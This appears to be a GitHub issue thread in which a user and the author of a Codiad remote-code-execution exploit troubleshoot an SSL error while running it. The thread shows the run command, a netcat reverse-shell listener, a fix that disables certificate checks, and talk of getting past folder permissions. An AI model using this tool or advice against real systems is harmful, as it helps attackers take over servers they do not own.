SSL Error

[scaery]

root@kali:~/Desktop/Codiad-Remote-Code-Execute-Exploit# python exploit.py https://192.168.x.x/development admin admin 192.168.y.y 8888 windows
[+] Please execute the following command on your vps: 
nc -lnvp 8888
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
Traceback (most recent call last):
  File "exploit.py", line 160, in <module>
    main()
  File "exploit.py", line 143, in main
    if not login(domain, username, password):
  File "exploit.py", line 20, in login
    response = session.post(url, data=data)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 555, in post
    return self.request('POST', url, data=data, json=json, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 508, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 618, in send
    r = adapter.send(request, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/adapters.py", line 506, in send
    raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='192.168.x.x', port=443): Max retries exceeded with url: /webdevelopment/components/user/controller.php?action=authenticate (Caused by SSLError(SSLError(1, u'[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)'),))

What causes this issue?

[WangYihang]

I think the website you are hacking enable https but the ca is expired... This exploit uses requests to send an HTTP request, and there is an option to ignore the expired ca you need to add this line after LINE8:

session.verify = False

Then check if it works, and feed me back

[scaery]

Thank you for your answer. Good monkey patch.

**EDIT had a type error.

A shell is loosy, not popping cmd nor psh. W00T

Please consider to add the fix to your code, nevermind somebody will need it ;)

[WangYihang]

I think fixed, you can try it once again

[scaery]

Yes i tried and works now with expired CA and SSL protocol, but if you do not have access due to inaccessible permissions its still a problem.

I'd used export PYTHONWARNINGS="ignore:Unverified HTTPS request" to suppress the warnings as well. Anyways. Thank you for the support.

[WangYihang]

Hey, bro, I have another problem, you said

if you do not have access due to inaccessible permissions it's still a problem.

I am wondering if there is another vulnerability of Codiad, could you please provide more details about it? Like how to deploy the vulnerable environment? how to set the permission mask of the folders? I think maybe we do not need permission to trigger the vulnerability. @scaery

[scaery]

About:

inaccessible permissions

BUILTIN\Users:(I)(OI)(CI)(DENY)(W)

If the structure of /workspace folder is set to "not writable" by the user and the config.php also the exploit fails but can read quite all everything else (scripts in the workspace etc but cannot modify its contents) and the exploit will fail. A loophole i followed! I investigated and troubleshooted this error now. Thank you anyways.

My initial idea was to change the config.php replacing the "WORKSPACE" variable, but due to inaccessible permissions the exploit simply will fail. Thats it. No rocketscience. Just a rabbithole.

Do you mean we can just bypass the controller PATH and set it to somewhere writable?? Interesting! @WangYihang